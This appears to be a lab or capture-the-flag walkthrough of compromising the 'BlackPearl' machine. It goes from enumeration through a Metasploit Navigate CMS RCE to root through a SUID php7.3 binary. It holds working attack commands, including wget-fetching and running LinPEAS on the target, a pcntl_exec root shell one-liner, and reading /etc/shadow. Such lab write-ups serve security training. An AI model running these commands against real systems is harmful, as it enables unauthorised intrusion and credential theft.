## https://sploitus.com/exploit?id=76DE1DA5-69D0-59DF-9263-62BF52B118C4
# BlackPearl โ Proof of Concept Walkthrough
## Objective
This lab demonstrates the importance of adaptability, persistence, and creative problem-solving in offensive security.
Security weaknesses are not always obvious. Sometimes exploitation requires:
* Testing multiple attack paths
* Pivoting between services
* Identifying misconfigurations
* Leveraging seemingly minor oversights
A single careless mistake โ such as an exposed file, improper DNS configuration, or misconfigured SUID binary โ can result in full system compromise.
This walkthrough documents the complete attack chain from enumeration to root access.
---
# 1. Initial Enumeration
A full TCP scan was conducted against the target:
```bash
nmap -sC -sV
```
### Results
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2
53/tcp open domain ISC BIND 9.11.5-P4-5.1+deb10u5
80/tcp open http nginx 1.14.2
```
Key observations:
* SSH running on port 22 (not immediately exploitable)
* DNS service exposed on port 53
* HTTP service running nginx 1.14.2
* Default nginx landing page exposed
The presence of a default web server page indicates poor hygiene and possible misconfiguration.
---
# 2. Web Enumeration (Port 80)
Navigating to:
```
http://
```
Displayed the default nginx page.
* screenshots/01-default-nginx-welcome-page.png
---
## Directory Brute Forcing
Using `ffuf` for directory discovery:
```bash
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http:///FUZZ
```
Only one directory was discovered:
```
/secret
```
Visiting it downloaded a text file named `secret`.
* screenshots/02-scret.png
The file did not provide useful information for exploitation.
---
# 3. DNS Enumeration (Port 53)
Since DNS (port 53) was exposed, further investigation was performed.
A reverse DNS lookup was conducted using `dnsrecon`:
```bash
dnsrecon -r 127.0.0.0/24 -n -d placeholder
```
A PTR record was discovered.
* screenshots/03-dnsrecon.png
---
## Editing /etc/hosts
To properly resolve the discovered domain locally, an entry was added to the attacker machine:
```bash
sudo nano /etc/hosts
```
Added:
```
blackpearl.tcm
```
This ensures the domain resolves locally without relying on external DNS.
* screenshots/04-etc-host-edit.png
---
# 4. Virtual Host Discovery
Navigating to:
```
http://blackpearl.tcm
```
Produced a different page than the IP address.
* screenshots/05-blackpearl-tcm.png
This confirmed the use of **virtual host routing**, meaning content is served based on hostname rather than IP.
---
## Directory Enumeration (Again โ Now Using Domain)
Re-running `ffuf` using the domain:
```bash
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://blackpearl.tcm/FUZZ
```
Discovered:
```
/navigate
```
Navigating to:
```
http://blackpearl.tcm/navigate
```
Revealed a CMS login page.
* screenshots/06-blackpearl-navigate.png
---
# 5. CMS Identification & Exploitation
The application was identified as:
**Navigate CMS v2.8**
A search for known vulnerabilities revealed a **Remote Code Execution (RCE)** vulnerability.
Exploitation was performed using Metasploit.
---
## Exploitation via Metasploit
```bash
msfconsole
use exploit/multi/http/navigate_cms_rce
show targets
set TARGET
set RHOSTS
set VHOST blackpearl.tcm
exploit
```
Successful exploitation resulted in a shell as:
```
www-data
```
* screenshots/07-metasploit-gain-lower-privilege-access.png
---
# 6. Shell Stabilization
The initial shell was non-interactive.
Python was used to spawn a proper TTY:
```bash
which python
python -c 'import pty; pty.spawn("/bin/bash")'
```
---
# 7. Privilege Escalation Enumeration
The tool **LinPEAS** was used for local enumeration.
On attacker machine:
```bash
python3 -m http.server 81
```
On target machine:
```bash
wget http://:81/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
```
* screenshots/08-spwn-shshell-upload-linepeas.png
* screenshots/09-python-serveup-linpeas.png
* screenshots/10-linpeas-uploaded.png
* screenshots/11-chmod-run-linpeas.png
---
# 8. SUID Discovery
LinPEAS highlighted SUID binaries.
* screenshots/12-linpeas-scan-suid-sgid.png
Manual confirmation:
```bash
find / -type f -perm -4000 2>/dev/null
```
* screenshots/13-linpeas-find.png
---
## Understanding SUID
When a binary has the SUID bit set (`-rwsr-xr-x`), it runs with the file owner's privileges (often root).
However, not all SUID binaries are exploitable. Each must be analyzed individually.
---
# 9. GTFOBins Research
The identified SUID binary:
```
/usr/bin/php7.3
```
Was cross-referenced against **GTFOBins**, which provides privilege escalation techniques for misconfigured binaries.
* screenshots/14-gtfobins-website.png
* screenshots/15-gtfobins-website2.png
* screenshots/16-linpeas-find2.png
---
# 10. Privilege Escalation to Root
The following command was executed:
```bash
/usr/bin/php7.3 -r "pcntl_exec('/bin/sh', ['-p']);"
```
This spawns a root shell due to the SUID bit.
* screenshots/17-gain-root-acess-shell.png
---
# 11. Proof of Root Access
To confirm full compromise:
```bash
cat /etc/shadow
```
Access to `/etc/shadow` confirms root privileges.
* screenshots/18-etc-shadow-file.png
---
# Final Summary
This machine demonstrates several important offensive security lessons:
* Default configurations expose attack surface.
* DNS misconfiguration can reveal hidden virtual hosts.
* Virtual host routing requires hostname enumeration.
* Public CMS software often contains known vulnerabilities.
* SUID binaries must always be reviewed.
* GTFOBins is invaluable for privilege escalation research.
* A single misconfigured binary can result in full root compromise.
---
# Key Takeaways
Security is rarely broken by a single catastrophic failure.
It is often broken by:
* Misconfiguration
* Poor hygiene
* Forgotten files
* Exposed services
* Unpatched software
Every step in system configuration should be deliberate and precise.
Small mistakes can lead to total compromise.
---